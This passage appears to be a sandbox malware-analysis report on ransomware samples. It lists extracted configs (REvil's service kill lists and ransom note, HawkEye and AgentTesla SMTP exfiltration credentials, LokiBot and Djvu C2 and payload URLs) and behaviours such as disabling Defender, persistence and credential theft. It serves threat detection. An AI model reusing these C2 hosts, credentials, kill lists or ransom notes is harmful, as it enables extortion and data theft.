beandrivingschool.com.au
paardcentraal.nl
oexebusiness.com
magrinya.net
adaduga.info
rarefoods.ro
palema.gr
ultimatelifesource.com
ox-home.com
grafikstudio-visuell.de
allinonecampaign.com
davedavisphotos.com
unislaw-narty.pl
avisioninthedesert.com
factoriareloj.com
mieleshopping.it
ruggestar.ch
rtc24.com
keuken-prijs.nl
edrickennedymacfoy.com
sambaglow.com
natturestaurante.com.br
nationnewsroom.com
der-stempelking.de
sveneulberg.de
yourhappyevents.fr
mslp.org
fitnessblenderstory.com
smartspeak.com
condormobile.fr
imajyuku-sozoku.com
5thactors.com
kenmccallum.com
gazelle-du-web.com
circlecitydj.com
rino-gmbh.com
pixelhealth.net
uncensoredhentaigif.com
docarefoundation.org
perceptdecor.com
jollity.hu
bjornvanvulpen.nl
wrinstitute.org
o90.dk
atma.nl
electricianul.com
cxcompany.com
schlagbohrmaschinetests.com
bumbipdeco.site
epicjapanart.com
tradenavigator.ch
innersurrection.com
mike.matthies.de
tatyanakopieva.ru
c-sprop.com
bulyginnikitav.000webhostapp.com
perfectgrin.com
forextimes.ru
bd2fly.com
landgoedspica.nl
bmw-i-pure-impulse.com
brownswoodblog.com
jobscore.com
circuit-diagramz.com
letterscan.de
jimprattmediations.com
limounie.com
animation-pro.co.uk
delegationhub.com
apmollerpension.com
leansupremegarcinia.net
reizenmetkinderen.be
lesyeuxbleus.net
floweringsun.org
eshop.design
istantidigitali.com
billyoart.com
asiaartgallery.jp
baptistdistinctives.org
belofloripa.be
trivselsguide.dk
ahgarage.com
bendel-partner.de
cmeow.com
prometeyagro.com.ua
graygreenbiomedservices.com
opt4cdi.com
turing.academy
alnectus.com
kristianboennelykke.dk
skyboundnutrition.co.uk
dantreranch.com
chris-anne.com
masecologicos.com
dieetuniversiteit.nl
basindentistry.com
husetsanitas.dk
mjk.digital
xn--80abehgab4ak0ddz.xn--p1ai
tweedekansenloket.nl
altocontatto.net
foerderverein-vatterschule.de
santastoy.store
tellthebell.website
baikalflot.ru
oththukaruva.com
tages-geldvergleich.de
palmenhaus-erfurt.de
ziliak.com
jeanmonti.com
pourlabretagne.bzh
wg-heiligenstadt.de
fixx-repair.com
cops4causes.org
glennverschueren.be
lovcase.com
proffteplo.com
rhino-storage.co.uk
pharmeko-group.com
frankgoll.com
andrealuchesi.it
n-newmedia.de
oncarrot.com
victorvictoria.com
beauty-traveller.com
wineandgo.hu
cssp-mediation.org
internestdigital.com
licensed-public-adjuster.com
easydental.ae
finsahome.co.uk
grupoexin10.com
outstandingminialbums.com
catering.com
martha-frets-ceramics.nl
diakonie-weitramsdorf-sesslach.de
eksperdanismanlik.com
transifer.fr
hameghlim.com
funworx.de
catchup-mag.com
hutchstyle.co.uk
stanleyqualitysystems.com
production-stills.co.uk
techybash.com
skidpiping.de
2020hindsight.info
dmlcpa.com
katherinealy.com
fbmagazine.ru
enactusnhlstenden.com
qandmmusiccenter.com
m2graph.fr
hm-com.com
fire-space.com
mind2muscle.nl
adabible.org
3daywebs.com
jdscenter.com
centuryvisionglobal.com
silkeight.com
rvside.com
schluesseldienste-hannover.de
andermattswisswatches.ch
tecleados.com
oportowebdesign.com
avis.mantova.it
miscbo.it
bundan.com
artcase.pl
liveyourheartout.co
belinda.af
leadforensics.com
itheroes.dk
queertube.net
so-sage.fr
bertbutter.nl
evsynthacademy.org
mindfuelers.com
pajagus.fr
haard-totaal.nl
alattekniksipil.com
ravage-webzine.nl
akwaba-safaris.com
denverwynkoopdentist.com
dreamvoiceclub.org
citiscapes-art.com
studionumerik.fr
speiserei-hannover.de
edvestors.org
bayshoreelite.com
coachpreneuracademy.com
almamidwifery.com
ncn.nl
adedesign.com
carolynfriedlander.com
xrresources.com
aheadloftladders.co.uk
ingresosextras.online
mbuildinghomes.com
atrgroup.it
drbrianhweeks.com
mustangmarketinggroup.com
vvego.com
profiz.com
brighthillgroup.com
universelle.fr
daveystownhouse.com
wordpress.idium.no
advance-refle.com
primemarineengineering.com
craftron.com
test-teleachat.fr
nexstagefinancial.com
haus-landliebe.de
theater-lueneburg.de
drvoip.com
zinnystar.com
zdrowieszczecin.pl
fsbforsale.com
lattalvor.com
dnqa.co.uk
fskhjalmar.se
azerbaycanas.com
satoblog.org
linearete.com
domaine-des-pothiers.com
aoyama.ac
shrinkingplanet.com
levelseven.be
theboardroomafrica.com
banukumbak.com
zuerich-umzug.ch
awag-blog.de
happycatering.de
optigas.com
thehovecounsellingpractice.co.uk
breathebettertolivebetter.com
randyabrown.com
bavovrienden.nl
mesajjongeren.nl
subquercy.fr
brannbornfastigheter.se
auto-opel.ro
ciga-france.fr
cyberpromote.de
computer-place.de
webforsites.com
golfclublandgoednieuwkerk.nl
bubbalucious.com
mariajosediazdemera.com
operativadigital.com
b3b.ch
askstaffing.com
sprintcoach.com
deduktia.fi
livedeveloper.com
sololibrerie.it
molinum.pt
logosindustries.com
nauticmarine.dk
michaelfiegel.com
acibademmobil.com.tr
protoplay.ca
agendatwentytwenty.com
the-beauty-guides.com
g2mediainc.com
gatlinburgcottage.com
hypogenforensic.com
omegamarbella.com
gta-jjb.fr
johnstonmingmanning.com
jacquesgarcianoto.com
ijsselbeton.nl
thiagoperez.com
juergenblaetz.de
photonag.com
rattanwarehouse.co.uk
efficiencyconsulting.es
curtsdiscountguns.com
pazarspor.org.tr
rubyaudiology.com
sjtpo.org
myplaywin3.com
hom-frisor.dk
vedsegaard.dk
bookingwheel.com
domilivefurniture.com
tchernia-conseil.fr
hostaletdelsindians.es
focuskontur.com
penumbuhrambutkeiskei.com
narca.net
nvisionsigns.com
catalyseurdetransformation.com
jglconsultancy.com
cesep2019.com
kookooo.com
omnicademy.com
karmeliterviertel.com
mursall.de
comoserescritor.com
abulanov.com
kryptos72.com
xn--80addfr4ahr.dp.ua
ikzoekgod.be
go.labibini.ch
a-zpaperwork.eu
rs-danmark.dk
tastevirginia.com
90nguyentuan.com
ocduiblog.com
clinic-beethovenstrasse-ag.ch
zealcon.ae
ced-elec.com
block-optic.com
napisat-pismo-gubernatoru.ru:443
annida.it
rhino-turf.com
billscars.net
selected-minds.de
nourella.com
jmmartinezilustrador.com
ykobbqchicken.ca
amco.net.au
hekecrm.com
etgdogz.de
bescomedical.de
mensemetgesigte.co.za
buerocenter-butzbach-werbemittel.de
sweetz.fr
kombi-dress.com
alpesiberie.com
witraz.pl
projektparkiet.pl
taulunkartano.fi
wyreforest.net
alaskaremote.com
eastgrinsteadwingchun.com
digitale-elite.de
hospitalitytrainingsolutions.co.uk
brinkdoepke.eu
betterce.com
topvijesti.net
nykfdyrehospital.dk
anchelor.com
jameswilliamspainting.com
dayenne-styling.nl
augen-praxisklinik-rostock.de
dinecorp.com
julielusktherapy.com
sbit.ag
invela.dk
pureelements.nl
pinkxgayvideoawards.com
blavait.fr
weddingceremonieswithtim.com
citydogslife.com
mariannelemenestrel.com
mindsparkescape.com
vapiano.fr
volta.plus
dentallabor-luenen.de
hepishopping.com
dr-vita.de
p-ride.live
legundschiess.de
sachainchiuk.com
onlinetvgroup.com
jobstomoveamerica.org
suitesartemis.gr
redctei.co
lmmont.sk
ketomealprep.academy
skinkeeper.li
mahikuchen.com
springfieldplumbermo.com
molade.nl
guohedd.com
grancanariaregional.com
agencewho-aixenprovence.fr
breakluckrecords.com
bruut.online
cp-bap.de
rapid5kloan.org
advanced-removals.co.uk
noda.com.ua
matteoruzzaofficial.com
andreaskildegaard.dk
ronielyn.com
mondolandscapes.com
dentalcircle.com
expohomes.com
scholarquotes.com
jandhpest.com
ceocenters.com
precisetemp.com
initconf.com
ya-elka.ru
kemtron.fr
t3brothers.com
margaretmcshane.com
christopherhannan.com
wribrazil.com
sber-biznes.com
handyman-silkeborg.dk
rivermusic.nl
the5thquestion.com
imagine-entertainment.com
duthler.nl
suonenjoen.fi
slotenmakerszwijndrecht.nl
nalliasmali.net
ebible.co
chorusconsulting.net
thenalpa.com
linkbuilding.life
martinipstudios.com
motocrossplace.co.uk
aciscomputers.com
promus.ca
salonlamar.nl
cl0nazepamblog.com
designimage.ae
richardkershawwines.co.za
lassocrm.com
triplettabordeaux.fr
jlgraphisme.fr
rokthetalk.com
memphishealthandwellness.com
spectamarketingdigital.com.br
min-virksomhed.dk
buffdaddyblog.com
thisprettyhair.com
site.markkit.com.br
elitkeramika-shop.com.ua
11.in.ua
krishnabrawijaya.com
irizar.com
acumenconsultingcompany.com
chomiksy.net
endstarvation.com
mrmac.com
limmortelyouth.com
gardenpartner.pl
fanuli.com.au
nbva.co.uk
gaearoyals.com
spirello.nl
csaballoons.com
putzen-reinigen.com
lagschools.ng
alabamaroofingllc.com
blucamp.com
boloria.de
mamajenedesigns.com
broccolisoep.nl
kosten-vochtbestrijding.be
datatri.be
achetrabalhos.com
die-immo-agentur.de
onlinemarketingsurgery.co.uk
1deals.com
humanviruses.org
jag.me
animalfood-online.de
watchsale.biz
boyfriendsgoal.site
dinedrinkdetroit.com
gratiocafeblog.wordpress.com
hnkns.com
explora.nl
placermonticello.com
bringmehope.org
buzzneakers.com
goodherbalhealth.com
antesacademy.it
deziplan.ru
girlish.ae
nutriwell.com.sg
yvesdoin-aquarelles.fr
apiarista.de
soundseeing.net
metriplica.academy
inewsstar.com
lsngroupe.com
patriotcleaning.net
framemyballs.com
arearugcleaningnyc.com
lookandseen.com
bourchier.org
chatterchatterchatter.com
sellthewrightway.com
schroederschoembs.com
anleggsregisteret.no
imaginekithomes.co.nz
stitch-n-bitch.com
paprikapod.com
olry-cloisons.fr
holocine.de
fridakids.com
carmel-york.com
markseymourphotography.co.uk
goodboyscustom.com
adterium.com
prodentalblue.com
bluemarinefoundation.com
aquacheck.co.za
mundo-pieces-auto.fr
netadultere.fr
tieronechic.com
arazi.eus
eos-horlogerie.com
palmecophilippines.com
bcabattoirs.org
walterman.es
theatre-embellie.fr
wademurray.com
shortysspices.com
biketruck.de
laaisterplakky.nl
wirmuessenreden.com
albcleaner.fr
karelinjames.com
web865.com
georgemuncey.com
tanatek.com
eatyoveges.com
fla.se
moira-cristescu.com
photographycreativity.co.uk
thestudio.academy
bohrlochversicherung.info
k-zubki.ru
testitjavertailut.net
crestgood.com
myfbateam.com
customroasts.com
terraflair.de
sunsolutions.es
startuplive.org
mazzaropi.com.br
cleanroomequipment.ie
glende-pflanzenparadies.de
ilveshistoria.com
berdonllp.com
arabianmice.com
latteswithleslie.com
rename.kz
neonodi.be
smartmind.net
tramadolhealth.com
dcc-eu.com
global-migrate.com
bridalcave.com
traitware.com
livelai.com
alexwenzel.de
raeoflightmusic.com
agriturismocastagneto.it
skolaprome.eu
tesisatonarim.com
werkzeugtrolley.net
trainiumacademy.com
piestar.com
the-cupboard.co.uk
sharonalbrightdds.com
fta-media.com
pansionatblago.ru
baita.ac
riffenmattgarage.ch
enews-qca.com
galatee-couture.com
blueridgeheritage.com
globalcompliancenews.com
redpebblephotography.com
metallbau-hartmann.eu
janmorgenstern.com
four-ways.com
bagaholics.in
5pointpt.com
directique.com
nevadaruralhousingstudies.org
switch-made.com
maryairbnb.wordpress.com
saboboxtel.uk
pvandambv.nl
affligemsehondenschool.be
rozmata.com
factorywizuk.com
dogsunlimitedguide.com
futurenetworking.com
smartercashsystem.com
azloans.com
racefietsenblog.nl
topautoinsurers.net
insane.agency
muller.nl
cotton-avenue.co.il
greenrider.nl
simpleitsolutions.ch
rolleepollee.com
billigeflybilletter.dk
whoopingcrane.com
corporacionrr.com
mariamalmahdi.com
parksideseniorliving.net
banksrl.co.za
monstarrsoccer.com
agora-collectivites.com
birthplacemag.com
cardsandloyalty.com
hiddensee-buhne11.de
reputation-medical.online
qrs-international.com
rechtenplicht.be
poems-for-the-soul.ch
furland.ru
worldproskitour.com
craftstone.co.nz
zorgboerderijravensbosch.nl
utilisacteur.fr
pro-gamer.pl
heuvelland-oaze.nl
yayasanprimaunggul.org
luvbec.com
fascaonline.com
ramirezprono.com
alene.co
mediahub.co.nz
eafx.pro
cincinnatiphotocompany.org
angelika-schwarz.com
magnetvisual.com
newonestop.com
dennisverschuur.com
rentsportsequip.com
lollachiro.com
skooppi.fi
awaisghauri.com
pays-saint-flour.fr
ronaldhendriks.nl
signamedia.de
carsten.sparen-it.de
tutvracks.com
direitapernambuco.com
goddardleadership.org
thegetawaycollective.com
cuadc.org
schulz-moelln.de
iexpert99.com
ivancacu.com
pilotgreen.com
chatberlin.de
sochi-okna23.ru
energosbit-rp.ru
alcye.com
akcadagofis.com
sycamoregreenapts.com
-
net
false
-
pid
48
-
prc
pvlsvr
dbsnmp
VeeamDeploymentSvc
dbeng50
beserver
bengien
powerpnt
bedbh
EnterpriseClient
ocomm
outlook
thunderbird
thebat
isqlplussvc
steam
infopath
tbirdconfig
xfssvccon
sql
onenote
mydesktopservice
DellSystemDetect
visio
sqbcoreservice
msaccess
ocssd
raw_agent_svc
oracle
vxmon
excel
ocautoupds
mspub
benetns
VeeamTransportSvc
agntsvc
CagService
wordpad
VeeamNFSSvc
winword
firefox
synctime
encsvc
mydesktopqos
vsnapvss
-
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
-
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
-
sub
2839
-
svc
stc_raw_agent
BackupExecAgentAccelerator
AcrSch2Svc
vss
backup
PDVFSService
VSNAPVSS
VeeamDeploymentService
sophos
ARSM
BackupExecVSSProvider
memtas
svc$
MSSQL$
BackupExecJobEngine
VeeamTransportSvc
VeeamNFSSvc
mepocs
BackupExecAgentBrowser
MSSQL
CAARCUpdateSvc
CASAD2DWebSvc
BackupExecManagementService
veeam
BackupExecRPCService
MSExchange
MVarmor64
WSBExchange
sql
AcronisAgent
bedbg
BackupExecDiveciMediaService
MSExchange$
MVArmor
Extracted
hawkeye_reborn
10.0.0.0
Protocol: smtp- Host:
smtp.mail.ru - Port:
587 - Username:
[email protected] - Password:
(#@jS%{GF;0
51ca91c3-9a11-4443-9e61-ee6e5c097d44
-
fields
map[_AntiDebugger:false _AntiVirusKiller:false _BotKiller:false _ClipboardLogger:true _Delivery:0 _DisableCommandPrompt:false _DisableRegEdit:false _DisableTaskManager:false _Disablers:false _EmailPassword:(#@jS%{GF;0 _EmailPort:587 _EmailSSL:true _EmailServer:smtp.mail.ru _EmailUsername:[email protected] _ExecutionDelay:5 _FTPPort:0 _FTPSFTP:false _FakeMessageIcon:0 _FakeMessageShow:false _FileBinder:false _HideFile:false _HistoryCleaner:false _Install:false _InstallLocation:0 _InstallStartup:false _InstallStartupPersistance:false _KeyStrokeLogger:true _LogInterval:10 _MeltFile:false _Mutex:51ca91c3-9a11-4443-9e61-ee6e5c097d44 _PasswordStealer:true _ProcessElevation:false _ProcessProtection:false _ScreenshotLogger:true _SystemInfo:true _Version:10.0.0.0 _WebCamLogger:false _WebsiteBlocker:false _WebsiteVisitor:false _WebsiteVisitorVisible:false _ZoneID:false]
-
name
HawkEye RebornX, Version=10.0.0.0, Culture=neutral, PublicKeyToken=null
Extracted
lokibot
http://107.175.150.73/~giftioz/.rojonm/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Extracted
djvu
http://mopg.top/Asjdi435784ihjk65pen2/get.php
http://nokd.top/ydtftysdtyftysdfsdpen3/get.php
http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php
-
extension
.rezm
-
offline_id
oTNOXYrFxLZ6FFJDHoOj4iFOlC2xJsN3KurV05t1
-
payload_url
http://mopg.top/files/penelop/updatewin1.exe
http://mopg.top/files/penelop/updatewin2.exe
http://mopg.top/files/penelop/updatewin.exe
http://mopg.top/files/penelop/3.exe
http://mopg.top/files/penelop/4.exe
http://mopg.top/files/penelop/5.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-yVc390S6cs Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0211Asd4a7d6
Extracted
xtremerat
iaficasioo.zapto.org
Extracted
agenttesla
Protocol: smtp- Host:
mail.gandi.net - Port:
587 - Username:
[email protected] - Password:
Blessed000@
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Detect XtremeRAT payload 2 IoCs
resource yara_rule behavioral1/files/0x0003000000020421-10256.dat family_xtremerat behavioral1/memory/3808-12816-0x0000000000C80000-0x0000000000D0C000-memory.dmp family_xtremerat -
Detected Djvu ransomware 4 IoCs
resource yara_rule behavioral1/memory/3192-1560-0x0000000000400000-0x0000000004766000-memory.dmp family_djvu behavioral1/memory/2828-2201-0x0000000000400000-0x000000000056E000-memory.dmp family_djvu behavioral1/memory/3552-1558-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2828-7588-0x0000000000400000-0x000000000056E000-memory.dmp family_djvu -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Djvu family
-
Emotet family
-
GandCrab payload 3 IoCs
resource yara_rule behavioral1/files/0x0008000000023bce-997.dat family_gandcrab behavioral1/files/0x0008000000023bcf-1001.dat family_gandcrab behavioral1/files/0x0008000000023bd0-1016.dat family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
HawkEye Reborn
HawkEye Reborn is an enhanced version of the HawkEye malware kit.
-
Hawkeye_reborn family
-
Lokibot family
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
description ioc Process Key created \REGISTRY\MACHINE\software\policies\microsoft\windows defender\real-time protection msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\real-time protection\DisableBehaviorMonitoring = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\real-time protection\DisableOnAccessProtection = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\real-time protection\DisableScanOnRealtimeEnable = "1" msiexec.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sodinokibi family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" msiexec.exe -
XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
-
Xtremerat family
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/5460-26644-0x0000000000400000-0x000000000044E000-memory.dmp family_agenttesla -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/5676-1060-0x00000000055E0000-0x0000000005656000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/5676-1060-0x00000000055E0000-0x0000000005656000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/5676-1060-0x00000000055E0000-0x0000000005656000-memory.dmp WebBrowserPassView -
Renames multiple (274) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (66) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral1/memory/3264-891-0x0000000140000000-0x00000001400FB000-memory.dmp mimikatz behavioral1/memory/3164-1049-0x0000000000400000-0x0000000000B5B000-memory.dmp mimikatz behavioral1/memory/3164-1053-0x0000000000400000-0x0000000000B5B000-memory.dmp mimikatz behavioral1/memory/3164-4251-0x0000000000400000-0x0000000000B5B000-memory.dmp mimikatz behavioral1/memory/3164-8791-0x0000000000400000-0x0000000000B5B000-memory.dmp mimikatz -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\MozillaMaintenanceServiceu = "C:\\ProgramData\\Mozilla Maintenance Service\\MozillaMaintenanceServiceu.exe" msiexec.exe -
Disables taskbar notifications via registry modification
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HPXmmgLUSavYuccxma5.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\38d435a138d432416c.lock HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\YEYFQM-MANUAL.txt HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe -
Executes dropped EXE 35 IoCs
pid Process 4104 HEUR-Trojan-Ransom.MSIL.Blocker.gen-481e96139f87e511669b713d5810b18682d9914699cc4f1f51f71ec12523bfa8.exe 2272 HEUR-Trojan-Ransom.Win32.Blocker.vho-5caad423df6fcb87b21006eabe45e3cb5dae1a5dba8f3b0c1a9e6ca0af350666.exe 4700 HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe 2424 HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe 1836 HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe 4476 HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb135d0764932501b0122620e2b7a7ca5b56786d1a937871372ae989609cc3f8.exe 752 HEUR-Trojan-Ransom.Win32.Generic-c85c16d46f7830ad5afc138282399bb1de7b71e67d516e7c76973c54d187d906.exe 1808 tpvpyme.exe 5096 Trojan-Ransom.MSIL.GandCrypt.f-5517c81c33300ed1d8771752b2ce39b47461c1246ecde81393df552a0b445e58.exe 1948 Trojan-Ransom.Win32.Blocker.jiqg-ebcb76212a57b469c83b1893f3b22c4199e8726495b057e2c45b3ce146f8d4cc.exe 2224 Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe 4300 Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe 380 HPXmmgLUSavYuccxma5.exe 3164 Trojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exe 3264 mmkt.exe 2636 Trojan-Ransom.Win32.DigiPog.ep-fdbe5f69bb19bd05372847a7e3aa3196bfbd2cf620baec58bb8ac42c995a61ac.exe 2712 Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe 2660 bmlplan.exe 4232 Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe 1896 bmlplan.exe 4032 Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe 2476 Trojan-Ransom.Win32.Sodin.abv-6e5f225b72d932fa68cafd3e0366298d5b1b92098049dcf01f6e3f2ad0f9b92e.exe 2864 Trojan-Ransom.Win32.Sodin.adh-a8330e4e9ae277220a20ab4fd818495b3e6ff997f2a07215435d4f6262eccdcd.exe 4004 Trojan-Ransom.Win32.Sodin.aaz-47e05f24669a0ffd7ca461aaf7e76e0b6e17f6cf424e4d854ddc584ee26ef42c.exe 4440 Trojan-Ransom.Win32.Sodin.alx-f87cc35fedf1bcfa47f9df0d08bbc0d6741f46241a214dbdfa6b2ae6ac09068a.exe 4392 Trojan-Ransom.Win32.Sodin.ax-a8309e454d9177a8fe2c84c79925fa800282f9fde2413f219dbf60fc77dd37a1.exe 4676 Trojan-Ransom.Win32.Sodin.bb-20684d3edd9d61bbe0a84559c8e197a02a123e697bc8d05bd9305cf1d3984c15.exe 3552 Trojan-Ransom.Win32.Stop.in-488fc31a56df22ee62120505326df0699627525c17fbdde472437f447ba2b779.exe 4700 Sicck.exe 3192 Trojan-Ransom.Win32.Stop.kz-51279cf0dd0716de867e5bc706ef180f4ff1ed62e56c8a5858565408f41423c5.exe 2828 Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe 2088 UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe 5656 HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe 6140 HPXmmgLUSavYuccxma5.exe 4416 Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 9872 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe -
Adds Run key to start application 2 TTPs 8 IoCs
